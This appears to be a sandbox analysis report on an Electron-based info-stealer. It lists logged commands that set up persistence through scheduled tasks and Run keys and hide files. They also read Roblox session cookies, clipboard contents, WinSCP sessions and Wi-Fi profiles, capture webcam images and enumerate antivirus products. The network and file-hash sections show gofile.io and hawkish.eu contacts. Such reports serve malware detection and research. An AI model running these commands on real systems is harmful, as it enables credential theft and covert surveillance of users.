C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Moyetu_bEtaa.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask }"

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupQQ0q8Q /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupQQ0q8Q /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupQQ0q8Q /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupQQ0q8Q /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupQQ0q8Q /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2984 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=2984 get ExecutablePath"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo wlan"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\FlpVJ7DXY7JF22hXICRN\System\cam.4152_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\O1Ji08xhJqly_temp.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\FlpVJ7DXY7JF22hXICRN\System\cam.4152_Admin.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {netsh wlan show profile}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\O1Ji08xhJqly_temp.ps1""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QQ0q8Q.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QQ0q8Q.vbs\""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutqgayo.ps1" -RunAsAdministrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutqgayo.ps1" -RunAsAdministrator"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_QQ0q8Q /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QQ0q8Q.vbs /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QQ0q8Q.vbs\"""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_QQ0q8Q /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_QQ0q8Q.vbs /f"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe

"C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\Moyetu_bEtaa.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAIAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=764 --field-trial-handle=1688,8499682399230122055,716585134206746690,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.4.4:443 dns.google tcp
FR 151.80.29.83:443 api.gofile.io tcp
US 136.175.8.205:443 store6.gofile.io tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 151.80.29.83:443 api.gofile.io tcp
DE 140.82.121.4:443 github.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
FR 163.5.121.96:443 hawkish.eu tcp
US 136.175.8.205:443 store6.gofile.io tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp
FR 163.5.121.96:443 hawkish.eu tcp

Files

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2ZleLpp0bDcScvs0JRzTiF0ytsT\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\d3dcompiler_47.dll

MD5 5156f24eaeb1035d880493bc21c5c10a
SHA1 0de25f14e26ba2076de24d3da6526a151dff9f3f
SHA256 e2ba9b9435f81f93fcdf4943134ac061f97cccda67b55b00c5e6fb29f48ddd3a
SHA512 cc9aeb4947ab1906426a568a749d2d5a83afc197e35c2fce0a7e5ccbb966b168c264b63ef0d83611e4b865ec3f248967342e047048285f02c266139f27ba8b76

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\LICENSES.chromium.html

MD5 680eac0f22ebe4b0c39b42e4406f8080
SHA1 5d8788749af44bd7fca94fc4e89d2ebb14b5caee
SHA256 75450781cd7109fc5a73af81b6d7127f4528b8671bb6f3487297193076b4c0a4
SHA512 6be284d98cea6948aeb2aeed880ebf31d404003b34f4230daa22ab35aed8fa3176fc094ff75706a58338bedf31cc7ca5f35c25937a9f017327daae7d00c0af69

C:\Users\Admin\AppData\Local\Temp\nsp86D4.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
